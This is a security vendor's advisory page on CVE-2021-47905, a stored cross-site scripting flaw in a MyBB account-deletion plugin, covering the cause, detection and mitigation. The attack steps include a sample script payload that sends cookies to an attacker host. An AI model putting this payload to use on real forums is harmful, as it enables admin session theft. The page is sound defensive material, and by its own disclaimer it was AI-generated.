The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2021-47905

CVE-2021-47905: MyBB Delete Account Plugin XSS Vulnerability

CVE-2021-47905 is a cross-site scripting flaw in MyBB Delete Account Plugin 1.4 that allows attackers to inject malicious scripts via the account deletion reason field. This post covers technical details, affected versions, and mitigation.

Published: January 30, 2026

CVE-2021-47905 Overview

CVE-2021-47905 is a Cross-Site Scripting (XSS) vulnerability affecting the MyBB Delete Account Plugin version 1.4. The vulnerability exists in the account deletion reason input field, where insufficient input sanitization allows attackers to inject malicious JavaScript code. When an administrator views the delete account reasons through the admin interface, the injected scripts execute within the administrator's browser context, potentially leading to session hijacking, administrative action manipulation, or further compromise of the forum platform.

Critical Impact

Attackers with basic user accounts can inject malicious scripts that execute with administrator privileges when viewed in the admin panel, potentially compromising the entire MyBB forum installation.

Affected Products

  • MyBB Delete Account Plugin version 1.4
  • MyBB forum installations using the vulnerable plugin version

Discovery Timeline

  • 2026-01-23 - CVE CVE-2021-47905 published to NVD
  • 2026-01-26 - Last updated in NVD database

Technical Details for CVE-2021-47905

Vulnerability Analysis

This stored Cross-Site Scripting (XSS) vulnerability (CWE-79) stems from the plugin's failure to properly sanitize user-supplied input in the account deletion reason field before storing it in the database and subsequently rendering it in the administrative interface. The attack exploits the trust relationship between the admin panel and user-generated content.

When a user initiates an account deletion request, they can provide a "reason" for the deletion. This reason field accepts arbitrary input without adequate HTML entity encoding or script filtering. The malicious payload is stored persistently in the database and later retrieved and displayed in the admin interface without output encoding, causing the browser to interpret and execute the injected script code.

The vulnerability requires user interaction—specifically, an administrator must view the deletion requests containing the malicious payload. However, since reviewing account deletion requests is a routine administrative task, exploitation is highly likely in active forum environments.

Root Cause

The root cause of this vulnerability is improper input validation and output encoding within the MyBB Delete Account Plugin. Specifically, the plugin fails to:

  1. Sanitize user input when accepting the deletion reason from the form submission
  2. Encode output properly when rendering the deletion reason in the admin control panel
  3. Implement Content Security Policy headers that could mitigate script execution

This represents a classic stored XSS pattern where user input flows directly from storage to browser rendering without transformation through a security-aware encoding layer.

Attack Vector

The attack follows a stored XSS pattern executed over the network. An authenticated attacker with a standard user account can exploit this vulnerability through the following steps:

  1. The attacker creates or uses an existing account on the target MyBB forum
  2. The attacker navigates to the account deletion feature provided by the vulnerable plugin
  3. In the "deletion reason" field, the attacker injects a malicious JavaScript payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>
  4. The malicious input is stored in the forum's database without sanitization
  5. When an administrator accesses the admin panel to review account deletion requests, the stored payload executes in their browser
  6. The attacker's script can then exfiltrate session cookies, perform administrative actions, or inject additional malicious content

For detailed technical information and proof-of-concept examples, refer to the Exploit-DB entry #49500 and the GitHub PoC Repository.

Detection Methods for CVE-2021-47905

Indicators of Compromise

  • Unusual JavaScript patterns or HTML tags in database records for account deletion reasons
  • Administrative session tokens appearing in unexpected HTTP requests to external domains
  • Anomalous admin panel activity following review of account deletion requests
  • Web application firewall logs showing XSS payloads in form submissions to the delete account functionality

Detection Strategies

  • Implement web application firewall (WAF) rules to detect and block common XSS patterns in form submissions
  • Deploy database monitoring to alert on suspicious content patterns in the deletion_reasons table or equivalent storage
  • Enable Content Security Policy (CSP) reporting to detect attempted script injections
  • Audit admin panel access logs for unusual activity patterns following interaction with user-submitted content

Monitoring Recommendations

  • Configure browser-based XSS auditing and CSP violation reporting for the admin interface
  • Monitor HTTP traffic for cookie exfiltration attempts to external domains
  • Implement integrity monitoring on admin session behavior to detect hijacking attempts
  • Review plugin update notifications and security advisories from the Vulncheck Advisory

How to Mitigate CVE-2021-47905

Immediate Actions Required

  • Disable or remove the MyBB Delete Account Plugin version 1.4 until a patched version is available
  • Review the database for any existing malicious payloads in account deletion reason fields
  • Invalidate all active administrator sessions as a precautionary measure
  • Implement Content Security Policy headers on the admin interface to restrict script execution sources
  • Consider deploying a WAF rule to filter XSS patterns in requests to the affected plugin endpoints

Patch Information

No official vendor patch has been identified in the available CVE data. Forum administrators should check the plugin's official repository or MyBB community resources for security updates. If no update is available, consider replacing the plugin with an alternative that properly sanitizes user input, or implement custom input validation on the affected form fields.

For additional technical details and community discussion, review the GitHub PoC Repository and Vulncheck Advisory.

Workarounds

  • Manually sanitize existing database entries by removing or encoding HTML/JavaScript content in deletion reason fields
  • Implement server-side input filtering using PHP's htmlspecialchars() or equivalent functions on the affected input
  • Deploy a reverse proxy or WAF with XSS filtering capabilities to inspect and sanitize incoming requests
  • Restrict admin panel access to trusted IP addresses to limit the attack surface
bash
# Example: Add CSP header in .htaccess for MyBB admin directory
<IfModule mod_headers.c>
    Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'"
</IfModule>

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeXSS

  • Vendor/TechMybb

  • SeverityMEDIUM

  • CVSS Score5.1

  • EPSS Probability0.03%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityLow
  • AvailabilityNone
  • CWE References
  • CWE-79
  • Technical References
  • GitHub PoC Repository

  • Exploit-DB #49500

  • Vulncheck Advisory on MyBB Plugin
  • Related CVEs
  • CVE-2018-25247: MyBB Like Plugin XSS Vulnerability

  • CVE-2018-25249: MyBB My Arcade Plugin XSS Vulnerability

  • CVE-2018-25250: MyBB Profile Plugin XSS Vulnerability

  • CVE-2018-25248: MyBB Downloads Plugin XSS Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English